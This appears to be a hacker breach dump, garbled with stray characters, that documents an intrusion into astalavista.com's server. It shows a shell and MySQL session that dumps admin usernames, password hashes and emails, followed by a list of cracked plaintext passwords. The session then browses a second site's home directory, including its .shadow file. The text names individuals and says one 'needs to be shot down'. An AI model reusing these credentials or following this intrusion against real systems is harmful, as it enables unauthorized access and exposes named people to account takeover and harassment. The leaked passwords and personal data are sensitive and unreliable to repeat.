5 z" f- a* j8 q8 P! ~9 ?4 K <title>ASTALAVISTA.com - Exploits</title>* }; k% ?. _7 U- q# F
<link>http://www.astalavista.com/exploits</link> ~, L" [" O. R
<description>All availably Exploits.</description>
) W' P: I! b: M8 ? <language>en-us</language>1 d0 E. R9 O: |4 h
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
* y3 i3 `$ j, D4 p( [5 q <docs>http://blogs.law.harvard.edu/tech/rss</docs>& ^- q! O. Y6 t& u
<generator>Astalavista.com</generator> I9 b$ `+ q0 b2 d4 V, Q
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘7 c) T0 o( C* v) g; `
</channel>
U: s* j: @1 \</rss>’;
/ C0 ^1 e; s9 l. g" {) W( y, x. b" D$ C
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
( Q$ Z# _; ]# Q! a8 P6 C unlink (FULLPATH . ‘/feed/exploits.xml’);7 s7 j' G. j; o; ^5 E( P
}
" n$ B$ w# e, _* O
1 s- m& Z8 z5 V; i. c t6 W* } file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);- U% Z: P2 j$ _; r7 H3 ~7 {% B
[snip]
: D# t- Y% y0 s" D0 l0 g& F
* Y3 k1 u$ y; V+ n7 a, Ash-3.2$ cat exploits.sh
7 f( I# @/ c4 R5 i7 J. ?! n#!/bin/sh
4 A/ H! R. }2 t9 P! p& @# e* `/ a$ I) j
###########################################################
( v1 n3 s4 b3 o& F8 ?- a# #
8 m j8 O0 L: N2 g# Title: milw0rm exploits adder #( d! Z4 n9 L4 S5 {% U
# Description: Add all milw0rm exploits to the #
9 u/ J2 p9 a, a0 e) [4 {# Astalavista.com database #
; {' S5 r! q! h9 @, [" Q! ^# #: T& H" T* M" A6 U, A
# Company: Astalavista Group #" R5 i% [7 N5 R1 b
# Author: Paulo M. Santos #
) j* E* D* j. P# G, a+ h# E-Mail: 链接标记paulo.santos@astalavista.ch #
! R' k! J5 y! U1 v' ~ n) v' T a9 M# #4 h3 Q7 ^$ D! w+ B X
###########################################################
' u+ x ^3 j' S% g2 i) X: S$ Q1 ~: u- T6 l2 b
# path
5 S8 y5 _% P5 x \3 K6 z& l8 Y9 sthis_path=/home/com/public_html/modifications/cronjobs4 M5 Y; a! c% z( b+ u; ?( p
) X* \6 \5 a b9 y
# change directory
( Y6 b' o5 m9 v$ p* h' I U6 @cd $this_path
/ x& w3 q5 u% Icd tmp/ c% X! f( f% V$ o' t3 B! z
) L- k( t6 C [+ _6 e b# delete files
/ V3 J5 I% a6 y0 Xrm -rf milw0rm.tar.* &
. G R: @( l" ^' vrm -rf milw0rm/ &
* S; Q: W5 s1 d+ F% G" K$ |
2 T' ?7 k" G/ x' T2 M# wget milw0rm paket
( {7 X {/ M8 rwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]- G" |# J6 d& O
5 p. x( a. g" w9 g) }
# extract milw0rm paket: l9 e5 q: y' Z. n
tar -xvf milw0rm.tar.bz2" b Z( u5 K' F% ]- |/ t
3 J% y( M8 {" @' P0 S% }, ~; q+ c: ~4 L
# change owner
$ i, a! r. n& h/ C6 X9 `! Q- schown -R com .
8 d \) h8 z. @5 @chgrp -R com .! M% J( M3 T' n* b) a
1 A8 a2 d1 V& k. t- E3 f
# execute php script
- Q" a% z U8 J1 V$ u) a4 Mcd $this_path
8 Z1 k" H4 a: z7 ?4 }php -q exploits.php
; K4 j9 R' a# G" Q# e5 i/ M' _. P) N5 v% u# x+ J' c! R: S
# delete files
" Q$ n: a" d$ arm -rf tmp/milw0rm.tar.*4 _/ K, [" K, u* O
rm -rf tmp/milw0rm/; M6 ^% G; l: m8 V. ?: V
" U& o H- c1 L- e: [; r3 w
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”+ s1 \4 ?$ r, s! I
Paulo M. Santos needs to be shot down.
, g* c6 N. s3 s% n$ r, e( C: v) q' q- V: H8 O0 c) Y1 v
mysql -u contrexxuser2 -p% Q* u6 N h6 n+ g
Enter password:. ?/ p2 V* q* L2 p/ \8 k2 g
Welcome to the MySQL monitor. Commands end with ; or \g.
5 |$ N! e* y$ o2 A u8 s NYour MySQL connection id is 2616945 z9 S" K) @; a5 C3 r- E3 N
Server version: 5.0.45-community-log MySQL Community Edition (GPL)2 S% g8 l2 ^. r
! b4 a1 r- }+ k
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.9 r J6 a! h( W1 [/ q3 d
7 H( ~; O% z7 D+ d# ^
mysql> show databases;
7 E8 B' d8 U8 ^# y+——————–+ r! T8 D0 l" T% \. d
| Database |
; P9 m& B5 p* s1 X6 h/ S& ^5 N9 R/ f! |+——————–+
. E6 C* _9 V* w6 J8 u' Z! @% G| information_schema |9 k) [& B* f/ x
| com_contrexx2 |: Q; ?8 X8 o+ l' P
| com_contrexx2_live |# T' x! a, U4 }4 d* ]5 {9 Z9 A
| test |
/ k% |" O4 J7 {7 V* f, A) u/ q+——————–+7 J, x$ R% v& O$ \
4 rows in set (0.00 sec)( D+ f7 C- m1 n: W
1 H& K- _# c2 N9 X4 Y1 m& Z
mysql> use com_contrexx2_live/ F; M9 I: c( l) T* X
Database changed' {4 ~' K& k6 B- L9 | F
mysql> show tables;" K* _ v8 x0 t% J4 L8 C n
+————————————————–+
6 m: y. M: e3 S. A5 g2 W% M5 E2 X9 t| Tables_in_com_contrexx2_live | {4 o# i O1 `1 M
+————————————————–+
2 m' e/ ?$ e7 s0 T* c. {. V9 w. p7 S- U| cc_banner_counter |. s1 T7 E2 C x& v& d) P
| cc_search_counter |* @, [9 M3 m+ \- f3 A+ I3 ]- Q7 W
| contrexx_access_group_dynamic_ids |
& b* A, K. `. A! ]; D| contrexx_access_group_static_ids |
5 E* @" j y* ]. o" ]| contrexx_access_rel_user_group |
' @ |; S9 G( T5 |; [/ @/ J| contrexx_access_settings |
! Q {& C& e! R1 ~, R$ ?| contrexx_access_user_attribute |
/ T: [6 c* k. d h% X1 z: G( {; n| contrexx_access_user_attribute_name |
+ u: U3 ^/ t7 F) P. ?0 {| contrexx_access_user_attribute_value |
: A4 ]' b: m; L; |6 k| contrexx_access_user_core_attribute |5 g6 b3 Z3 r0 e
| contrexx_access_user_groups |
! y9 B' F h0 _2 ?1 f, D+ Z| contrexx_access_user_mail |
" {' Y' ^3 C7 x' H$ J| contrexx_access_user_profile |
2 J+ `) b/ H: r4 f! `| contrexx_access_user_title |) X# L5 v' Y' i. X
| contrexx_access_user_validity |
" D7 `8 J# |1 {5 U! b7 }0 j| contrexx_access_users |
: c! ^% L& R8 v; e- G: G2 w| contrexx_backend_areas |
/ K% Z9 C# h+ A# V: G# y| contrexx_backups |
1 K$ K q! v9 Y+ @+ H0 a| contrexx_content |
( [0 r. Z1 X4 J) L M5 G2 U) z| contrexx_content_history |
9 [3 b q, S) S! d9 S5 e% q| contrexx_content_logfile |$ M8 o+ z( X4 t% |4 I
| contrexx_content_navigation |
- ~: y% W( l/ \' T| contrexx_content_navigation_history |$ Q+ h' f+ F9 d0 H( c0 h8 o
| contrexx_ids |) P5 U/ q9 U" w/ f( F
| contrexx_languages |% @" @4 B( }2 {3 C$ y* L+ t6 S; J4 t
| contrexx_lib_country |" U$ j7 o2 F. _* a. ?
| contrexx_log |8 |/ Z2 R1 N3 ]/ c7 Z1 L* \* e
| contrexx_module_alias_source |3 c' I+ {( T1 ]# }; N
| contrexx_module_alias_target |
3 w, Y1 v7 ]$ t% W/ _, t7 k| contrexx_module_block_blocks |
0 I4 l$ k1 B2 O3 H| contrexx_module_block_rel_lang |' j# ?- M2 k, y
| contrexx_module_block_rel_pages |; m5 x7 m) y: E# T4 B' L
| contrexx_module_block_settings |
0 Q( c# {% O: q4 A* z4 y| contrexx_module_blog_categories |
# R( [# x+ U# p| contrexx_module_blog_comments |
3 b. w# ]5 s! M| contrexx_module_blog_message_to_category |
3 X. [! ^, B: h6 }& x$ U" Z| contrexx_module_blog_messages |4 j: \1 ^' S% [3 h' M$ @# [. |
| contrexx_module_blog_messages_lang |& e5 O' P6 O7 t7 [; g$ S% P
| contrexx_module_blog_networks |0 R4 g& @& Q4 r0 w* @
| contrexx_module_blog_networks_lang |) @& W) ~) E# Z# x9 ~$ o
| contrexx_module_blog_settings |
+ O; S/ F* y, P6 R5 N3 b, w* L| contrexx_module_blog_votes |
: Y: _3 D+ \! t1 d1 u" i( F+ a| contrexx_module_calendar |% Q. a. K5 L- V4 W1 D$ d' a, I
| contrexx_module_calendar_access |0 B* d# |, B' g# a) x
| contrexx_module_calendar_categories |
- p* C2 @9 I) ~+ c- q8 _' S| contrexx_module_calendar_form_data |
5 M' K# s/ h" A$ E| contrexx_module_calendar_form_fields |4 P$ \8 [3 H+ F" B
| contrexx_module_calendar_registrations |+ q: s8 J6 r, V% ?
| contrexx_module_calendar_settings |
5 ~4 V) j, S0 `/ B| contrexx_module_calendar_style |" S- ~7 E2 Q0 N- s
| contrexx_module_contact_form |
$ L+ Q! N" _. P) q. J- B+ {8 n, h) P| contrexx_module_contact_form_data |
4 V9 v' ~5 f$ e1 [3 ?7 ]| contrexx_module_contact_form_field |* |, z. ?! F- o
| contrexx_module_contact_settings |
6 c( A3 Z5 y; ]1 || contrexx_module_data_categories |
2 J0 T0 p/ u. }' ^' F1 R- P| contrexx_module_data_message_to_category |
* ?, S. U" s, B. n8 o% r! P| contrexx_module_data_messages |
9 @4 Y" b2 S$ f! F. M' q" f| contrexx_module_data_messages_lang |
- g, e# e/ N- i/ h N) C7 j& C4 k| contrexx_module_data_placeholders |
1 \+ x. n, {7 u7 A3 L8 N+ f5 f7 b- z| contrexx_module_data_settings |; d5 W# R, P0 ^% U) W* g' F
| contrexx_module_directory_access |2 F3 O$ ?! n4 v) {& e# k
| contrexx_module_directory_categories |; j7 \4 ^$ }& ^" d/ `
| contrexx_module_directory_dir |5 d+ _9 @, c: _8 L) R) z; |% \
| contrexx_module_directory_inputfields |4 E0 v+ x6 s/ ? ^" U1 H* b' R
| contrexx_module_directory_levels |6 c! c. @& R! D& d
| contrexx_module_directory_mail |
1 K) u i* z T r| contrexx_module_directory_rel_dir_cat |
8 J! t" ]( [+ i- n& t' F| contrexx_module_directory_rel_dir_level |
+ P1 k" _5 R+ b$ I4 s| contrexx_module_directory_settings |
O, M4 |* s4 O$ K( n0 y| contrexx_module_directory_settings_google |
: R6 g# R5 }4 _- s% h" G| contrexx_module_directory_vote |. b2 n) W q4 f; M
| contrexx_module_docsys |, t) n: S7 u' D
| contrexx_module_docsys_categories |
( u" T; ~$ J2 R) Z- ?| contrexx_module_egov_configuration |
# r+ Y4 f- [& ^4 L| contrexx_module_egov_orders |
* k. W# |$ a1 z) ~1 S| contrexx_module_egov_product_calendar |9 _( U% u' A5 D, `
| contrexx_module_egov_product_fields | p8 f4 R) F- @& k8 O& z6 W) a. m
| contrexx_module_egov_products |
2 C5 e. c- ?8 B0 _- w) i| contrexx_module_egov_settings | D4 d, \8 y- O' h# H# y9 m
| contrexx_module_exploits |
1 v/ k: \. z2 w4 u: T| contrexx_module_exploits_categories |' F- v" Q, x7 ?, g- W x* n- V4 h
| contrexx_module_feed_category |7 |: C* u% G( g3 P7 g; M
| contrexx_module_feed_news |
% g3 H5 b. j- G| contrexx_module_feed_newsml_association |
1 I \! o$ k' [) p ~| contrexx_module_feed_newsml_categories |
6 ?1 v$ ?) P: C| contrexx_module_feed_newsml_documents |! c$ c# X5 ^2 s* c1 @+ J" t
| contrexx_module_feed_newsml_providers |
; H1 G% r: v# |/ J, N) k0 F4 E* n| contrexx_module_forum_access |' F1 s' l7 d# O# _6 m" H6 L% y8 i
| contrexx_module_forum_categories |4 H0 G) K( F+ w* _1 d
| contrexx_module_forum_categories_lang |8 V, b1 o. Z4 P& p
| contrexx_module_forum_notification |
1 e+ J, G8 x- X# M2 q. h! t; {' S| contrexx_module_forum_postings |: s6 }5 V. F" a
| contrexx_module_forum_rating |
a1 p7 I9 f7 t& C2 T# a6 R8 D| contrexx_module_forum_settings |- _$ T. l6 P: W
| contrexx_module_forum_statistics |, c; }; q: V7 W( ]
| contrexx_module_gallery_categories |9 k- ~7 Q" {2 y) B0 y
| contrexx_module_gallery_comments |6 a+ \1 ^* J) N4 `/ V1 T+ g
| contrexx_module_gallery_language |
/ f2 ] x& k! I& c+ c: N- L| contrexx_module_gallery_language_pics |
; ]& r, k" N" R" v| contrexx_module_gallery_pictures |
( W2 _- o" V/ ^4 V1 L E; i" A/ r7 O| contrexx_module_gallery_settings |
$ Z# B7 F* `) v' ~5 @. M4 r| contrexx_module_gallery_votes |
+ P+ q- l" n1 Y0 q9 d8 @| contrexx_module_guestbook |& N5 a$ B7 F8 G1 e( W2 T
| contrexx_module_guestbook_settings |
/ ]) |0 Y- V4 P5 N- f. \| contrexx_module_livecam |
: H( {3 r* L4 z9 N) A6 e# A( }| contrexx_module_livecam_settings |- J! E5 {+ R q$ B, f7 b, q
| contrexx_module_market |, m0 g X) j: q. L, W
| contrexx_module_market_access |4 Z+ p5 l* q4 t
| contrexx_module_market_categories |
) J6 F T) `" i3 g| contrexx_module_market_mail |
. J2 s) g) K0 n# _% o| contrexx_module_market_paypal |
% m& u/ e# A) J- B| contrexx_module_market_settings |
) Z/ F+ J6 r4 D P9 m" k3 v| contrexx_module_market_spez_fields |, E' x/ o3 q0 Q F
| contrexx_module_mediadir_access |
0 ~' J5 b) C( Z5 ^| contrexx_module_mediadir_categories |
7 p7 T2 ?6 j" t3 V' |( a& K9 W| contrexx_module_mediadir_comments |0 Y5 E/ ?+ L1 B' {
| contrexx_module_mediadir_dir |
1 N' D* a) B: m$ H% f| contrexx_module_mediadir_inputfields |. \4 T9 Q0 i# B. U1 M3 p5 M
| contrexx_module_mediadir_levels |
) H" w6 D8 l! f; A. E1 Y( A4 p" I% _| contrexx_module_mediadir_mail |
Q: R! d* }0 ~% e- M. _8 w| contrexx_module_mediadir_rel_dir_cat |
$ l# k! E" J/ ]/ L- t$ d0 E| contrexx_module_mediadir_rel_dir_level |' h* {/ K$ u) o
| contrexx_module_mediadir_reports |
! M( ~' R+ c& I3 f V| contrexx_module_mediadir_settings |: t4 }# `" \. B% [( a
| contrexx_module_mediadir_settings_google |8 s! r0 g$ e. b4 Y2 c. }: S
| contrexx_module_mediadir_vote |% P8 T1 `; E' I' F) K
| contrexx_module_memberdir_directories |
- c. R: {! z/ P P3 \8 B. L| contrexx_module_memberdir_name |
2 M8 u8 }: `; j. l0 x1 v6 D| contrexx_module_memberdir_settings |
7 K, a( U7 E2 w1 ^( B5 J| contrexx_module_memberdir_values |
9 m6 a: e0 e+ J+ V0 R9 z! Z+ a2 l| contrexx_module_nettools_allowed_groups |7 d$ ?$ Z3 ]9 r: [+ I6 S/ X" V+ k
| contrexx_module_nettools_settings |4 h, D; L9 I# P. ?7 D
| contrexx_module_news | O" T$ X) ?2 E3 {/ ^7 \
| contrexx_module_news_access |
@! V0 ~7 k2 i1 X| contrexx_module_news_categories |. K4 b! B" f6 w8 n- B$ c3 y1 C/ o( b, U
| contrexx_module_news_settings |
$ D" j0 m4 C$ ~1 y& o2 [| contrexx_module_news_teaser_frame |6 ~/ r3 X+ b, G/ h, \
| contrexx_module_news_teaser_frame_templates |" w( J$ l4 q8 ~# s2 P8 ^! C+ Y5 o
| contrexx_module_news_ticker |
O, s0 }3 L# o' {4 x# T* V| contrexx_module_newsletter |. k$ b2 l$ h% p- q3 N4 n8 M
| contrexx_module_newsletter_attachment |
! k8 x: ` B9 B1 y' A, o5 ?| contrexx_module_newsletter_category |
' g1 m6 D) G% ?; J* Z| contrexx_module_newsletter_confirm_mail |
: E. ]4 h1 ^7 m+ O. O| contrexx_module_newsletter_rel_cat_news |. |/ `4 A& Z* z; w
| contrexx_module_newsletter_rel_user_cat |/ S$ ^( k4 l+ o: w
| contrexx_module_newsletter_settings |! D$ n6 s# x0 d/ T6 a: D. g
| contrexx_module_newsletter_template |
& f, Q. p/ C3 g0 z3 Y9 B( I3 I| contrexx_module_newsletter_tmp_sending |
H3 w. J6 S: X8 ^6 {% f| contrexx_module_newsletter_user |! A. V- i9 L( z1 o- ^* q9 G
| contrexx_module_newsletter_user_title |
6 }' k- X( p9 h$ X0 F8 L2 P# A: h8 || contrexx_module_onlinetools_defaultports |/ k5 _# [" [1 M1 g. I; N: m3 `
| contrexx_module_onlinetools_defaultports_back |
2 V5 v- R( Y0 H: T| contrexx_module_onlinetools_geolitecity_blocks |
6 Y+ h, P: J1 N$ U0 u6 k9 Z( X| contrexx_module_onlinetools_geolitecity_country |
+ a5 U/ f5 d- z' @/ L| contrexx_module_onlinetools_geolitecity_location |
, \! h* n) m7 f7 e) [# W4 C6 r6 U| contrexx_module_podcast_category |
0 |2 Q, `1 v A) h# q/ O- f4 Z& ]1 {| contrexx_module_podcast_medium |
r+ k/ m+ U5 U" u3 _: U| contrexx_module_podcast_rel_category_lang |
9 J( W3 \4 T8 _5 m5 L$ I* h3 _| contrexx_module_podcast_rel_medium_category |& c! L5 _. a, r: ?& }$ {: g8 E
| contrexx_module_podcast_settings |
3 p, |0 O0 A& c% C| contrexx_module_podcast_template |
1 [# u7 `- j8 L- u) N8 G| contrexx_module_proxydb |
) H2 z" _& ^' ?% C7 || contrexx_module_recommend |( H3 O: @8 }' H' s0 Y3 n
| contrexx_module_repository |; v3 W O. U- ], s: J
| contrexx_module_securitynews_cats |
# Q6 D- x V. e0 c( b5 e+ X| contrexx_module_securitynews_feeds |: o# J4 a, |4 q) W6 h* V
| contrexx_module_securitynews_news |, Q7 `# P( u! R @' H5 X
| contrexx_module_shop_categories |
2 `& W2 ?% j: v5 U. {0 j, q| contrexx_module_shop_config |
. Y' H/ t" `, g4 m8 A| contrexx_module_shop_countries |
( H: {7 O4 }" V% A0 z| contrexx_module_shop_currencies |8 R4 k* P- O! {: s& `
| contrexx_module_shop_customers |
/ u1 }2 m; E& _& S4 ]3 y1 @| contrexx_module_shop_importimg |8 [" {2 M' o% P1 W9 z' q
| contrexx_module_shop_lsv |9 ~4 G; f8 j: ]" N1 y) }
| contrexx_module_shop_mail |
7 a1 q/ C1 w, E! o7 ~8 D| contrexx_module_shop_mail_content |
4 X6 A% {6 _0 t+ z0 ]. _% c0 Z| contrexx_module_shop_manufacturer |
$ J. [7 J, f% S" X w| contrexx_module_shop_order_items |0 P2 G! ]) R" c! u1 L- y
| contrexx_module_shop_order_items_attributes |
- k! I2 H) _" q M+ h8 v| contrexx_module_shop_orders |' _6 ?+ e9 M4 Z/ Z
| contrexx_module_shop_payment |' h" h4 ^- f# t3 j
| contrexx_module_shop_payment_processors |
2 U+ _4 q3 r6 C( R+ p8 O| contrexx_module_shop_pricelists |
' X- v: P3 S( \! v Z; j5 a| contrexx_module_shop_products |
& `. P, `$ t" L+ X) d| contrexx_module_shop_products_attributes |
) G8 ]9 E" u) F' U0 B& b/ I| contrexx_module_shop_products_attributes_name |
) }/ Z/ ?" j. r8 l4 P I| contrexx_module_shop_products_attributes_value |
$ `" @& ~2 ], P; I7 E; I) T) ^# _| contrexx_module_shop_products_downloads |$ |( W( w4 j- N( A
| contrexx_module_shop_rel_countries |: l8 J& ~% p7 {
| contrexx_module_shop_rel_payment |" C# K. v! L1 u- |
| contrexx_module_shop_rel_shipment |
; a, l% p9 S, S| contrexx_module_shop_shipment_cost |& ]4 x6 `9 V* |$ ?9 F% d2 x! J
| contrexx_module_shop_shipper |
4 l) u: {, i+ a6 v' Z& z, J4 C| contrexx_module_shop_vat |6 W) P& Y7 H: w& N$ |
| contrexx_module_shop_zones |* }& w$ h8 k$ s$ ~! Y
| contrexx_module_u2u_address_list |
. N) J% ]) P& T( L| contrexx_module_u2u_message_log |4 K+ @7 e- @4 H# R4 @: o6 s+ {
| contrexx_module_u2u_sent_messages |: e1 Y9 q6 |! _* z
| contrexx_module_u2u_settings |
7 M; x* Z4 |& D& e. M| contrexx_module_u2u_user_log |
- k3 ^! ?- J+ C% {; n# [0 t2 T| contrexx_modules |4 d% ?5 ?2 C. v
| contrexx_sessions |& x/ r& S j. n6 V# y' b- [9 y9 Y$ h
| contrexx_settings |3 P4 ^4 Y/ ~. V" b5 {
| contrexx_settings_smtp |
6 z! k+ G5 Y, M b3 H7 M| contrexx_skins |. b# k- y2 d4 N, J# V
| contrexx_stats_browser |2 k! x K9 @7 i. e
| contrexx_stats_colourdepth |; S/ ~- s2 ^) \% A% G9 X/ y) `8 n
| contrexx_stats_config |
* r0 q, v ~) w9 `# I7 _$ n| contrexx_stats_country |: { |1 m Q6 [+ p0 Y
| contrexx_stats_hostname |) S; H* I! g& u$ l! O
| contrexx_stats_javascript |( `3 f& c# ^+ h' y
| contrexx_stats_operatingsystem |
: e* D& c5 m; ]( c8 H| contrexx_stats_referer |% E6 e+ C' G5 Z0 d, p9 h
| contrexx_stats_requests | Q( A3 Y# J( f
| contrexx_stats_requests_summary |
& y& [: y* o* h* g/ Q| contrexx_stats_screenresolution |
! V/ B* B% [9 T, ^$ [# [| contrexx_stats_search |
( ~; i& r* l. N! h3 \| contrexx_stats_spiders | K) D, E( N/ ^( T x5 y5 |
| contrexx_stats_spiders_summary |' ^$ A" l3 G7 q( J/ j: I) h; y
| contrexx_stats_visitors |
/ N. P0 G" C, @3 b9 c| contrexx_stats_visitors_summary |+ v) k; ~! ~7 H; V. h; r3 l
| contrexx_voting_additionaldata |
% Q# h/ k# V$ i* d| contrexx_voting_email |/ x5 z# f6 A3 M" a. o
| contrexx_voting_rel_email_system |# C _% S6 `. a5 Q% z T
| contrexx_voting_results |
/ T9 k" Z4 Z0 d% }9 O| contrexx_voting_system |+ d. A, C* Q$ _" u8 L# M, J; x8 ^
| foo |/ K" R U3 O& V' r5 c+ Y
+————————————————–+' T4 j. F& E/ {6 [7 O
227 rows in set (0.01 sec)1 Y5 }, d3 _3 [: Z/ ^; x+ ?/ I7 Z
# u$ Z- `( }* G
mysql> select count(*) as skids from contrexx_access_users;
9 l5 @7 M+ ^" A4 ?# ^+——-+1 O& m- Y8 U7 P2 z" I b6 Y9 c8 v7 d
| skids |* ^5 i4 O7 Y' o, n
+——-+" t# ^, E8 |9 k5 f7 n P
| 53699 |
( l+ w, J9 l H+——-+
) m/ }9 i" Z' y1 row in set (0.00 sec)7 A2 j* L& j" c0 _) W
9 {, m# r2 r) g1 y& Mmysql> describe contrexx_access_users;* }6 i- T8 [# x* d r
+——————+——————————————+——+—–+————–+—————-+
; y4 B; {0 S/ X, K) Z, |) a| Field | Type | Null | Key | Default | Extra |& D7 b+ U* o0 V0 y9 ?/ M* |# {
+——————+——————————————+——+—–+————–+—————-+
8 H! A& }( v, O0 _6 s| id | int(10) unsigned | NO | PRI | NULL | auto_increment |& X, {, A- y0 y+ A& F8 A9 X& Z
| is_admin | tinyint(1) unsigned | NO | | 0 | |
+ m0 l7 R4 a) J| username | varchar(40) | YES | MUL | NULL | |
: F0 }, C. x- E3 V5 j" r! R| password | varchar(32) | YES | | NULL | |
9 ]+ Z2 Q7 I3 K9 v" {| regdate | int(14) unsigned | NO | | 0 | |
% D9 [. T+ }2 R; z& ` \* R| expiration | int(14) unsigned | NO | | 0 | |
$ E/ Y2 q* h, E3 G3 m0 X% l7 A( \5 w| validity | int(10) unsigned | NO | | 0 | |
1 b( |9 }; b8 @2 d| last_auth | int(14) unsigned | NO | | 0 | |4 w! j' B9 Q- L- h* ^. Q- P# k
| last_activity | int(14) unsigned | NO | | 0 | |
0 i6 m- V& T2 @0 || email | varchar(255) | YES | | NULL | |
9 h) L3 q9 t! M) Z6 u1 h n; E| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
( n* D/ D1 s1 [9 q- k8 e$ O# C# J| frontend_lang_id | int(2) unsigned | NO | | 0 | |! b5 d" Y& J& q: h5 y3 A2 m9 t: M
| backend_lang_id | int(2) unsigned | NO | | 0 | |( I3 @: x# i i8 c- i0 p6 e% b
| active | tinyint(1) | NO | | 0 | |7 y1 {0 r" A; x
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |1 W1 ]1 v; M- f# u
| restore_key | varchar(32) | NO | | | |
# d8 [3 L. t, l$ W4 c7 _; O| restore_key_time | int(14) unsigned | NO | | 0 | |
* f7 x. u R2 S4 {| u2u_active | enum(’0′,’1′) | NO | | 1 | |% t1 `, y/ V9 i% j5 z% V; H
+——————+——————————————+——+—–+————–+—————-+
: H9 ?. |2 e8 g! ~2 b$ Z! m; W18 rows in set (0.00 sec)
K& b, ?$ o! z& N% K0 B3 X: ^6 d6 \' I7 {. g0 U) `. g+ U" V* Z( b/ S: M
mysql> select username,password,email from contrexx_access_users where is_admin = 1;
( Z# {3 f& e) |3 M2 E' U+————+———————————-+—————————–+
( Q$ y: v5 l2 T0 \3 {6 Q| username | password | email |
+ e, G7 u& O" b' C+————+———————————-+—————————–+ a# A% N C4 c6 Z! g& l
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |8 ^3 @+ P% b7 N( a) t
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
, w; i# a+ O4 f2 N' x' D| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
8 K; R% z, r& b: K+ l9 W| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
* U1 D: M; {% t \3 Y+————+———————————-+—————————–+
' ]$ i5 F) x& _4 rows in set (0.04 sec). v' S0 j" q, w1 x5 J
: _, C. C9 n/ E: u4 t: Fmysql> exit;
9 o) M5 w! M9 Q2 U: ^0 \Bye
( X f3 P# A+ C* _4 i7 A, C9 j1 _+ t, g5 \4 R0 S- t
[~] There you go, your “team of security and IT professionals” is a joke.% p4 i2 K' s. ]* L/ S! ?
5 O; A6 `) u9 v$ s R% T5 |! L' g2 T+——————————+
z! B; H* a* v# Y, dsystem:f82BN3+_*
! i1 ?# ?4 Z# M- n, ~% M/ J* P6 yBe1er0ph0r:belerophor4astacom
0 q4 N M: z) w* aprozac:asta4cms!
% a8 O- O1 H1 p& |6 k: m+ j# kcommander:mpbdaagf6m
7 w" m* i* |) b$ ~: p% ^6 v }5 Isykadul:ak29eral1 ?& L3 i) F( }6 y
+——————————+
) Q5 T1 N9 [0 D4 A( L. G
8 `! q1 e) I" l0 E[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
' ^ a' o* C. `6 d* ^; M…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
0 f3 V G- }: m4 U r6 Z9 Y/ g$ `0 u' p5 U: K
[~] Lets move to astalavista.net now,+ O2 O& H& i- W. Z
! M& q! F; s& P) F" ]: D. V( r
From <链接标记[url]https://www.astalavista.net/[/url]>:7 x# ~1 `. Q. ], _9 H
>> Everyone knows that the best defense is a good offense.
2 \6 L6 [) d( x; S' R. Q* [>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
2 s* u% w; w& d. P( z6 ?>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.9 G0 N& t* q1 ~- h
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”% k" ~! R8 Z7 ~# O
% @6 u K: }5 a& p
>> Go ahead, try and hack our server . in a completely legal way!9 w$ A `) x' r5 k$ M
>> Learn by doing: We offer our members tricky tasks and challenges on an% k& [: ^, j" d2 {
>> ongoing basis so you can test your knowledge and abilities. You can also
8 \: T4 D% Q, w>> demonstrate what you.ve mastered by taking part in regular hacker contests0 }- z, A* i, @$ }, n: D
>> and war games
) d7 D6 a6 j; ]$ n+ a4 F3 L k! ^% i0 M4 p" q2 l
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!6 C3 l Z" G I$ o" K
2 x8 ]* ~* d, b0 @; L. ?[-] Tricky task: Find home dir of astalavista.net: x* X8 O% i4 e6 O w( S
. P& |) _+ R# J: V" J$ y
sh-3.2$ ls -la ~astanet3 t1 c$ f- k G( f; D
total 48: A' O6 [+ Y \3 u
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
4 @4 v- X' R( ~) ndrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..6 \# s7 J4 w$ ]& J
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth1 ^) N( d1 G$ w6 A
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history' A+ U' Z7 O# i# k
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout$ b" s7 c) p4 P
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
. X% i+ g( p/ g. R# {-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc, H; b, }1 [! j* [% s- Y7 M
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
! L# A2 @/ `! ddrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
9 b2 q, |$ ]+ u9 Q9 L* Ddrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail4 a, Q- N E& F% @( z ]1 @
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html' S( o6 z) v$ Q, J8 T
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow& ~( B$ V7 j2 w6 c* e
$ f* C& y+ Z5 S- Ash-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
9 T6 J6 g& K& e3 E& Q6 Ssh-3.2$ ls -la
4 A. q4 F6 i; r: D- Vtotal 200
- L# L P' B3 ydrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
! A; D: F! h* Q9 pdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..) T( P' V* o; k+ G
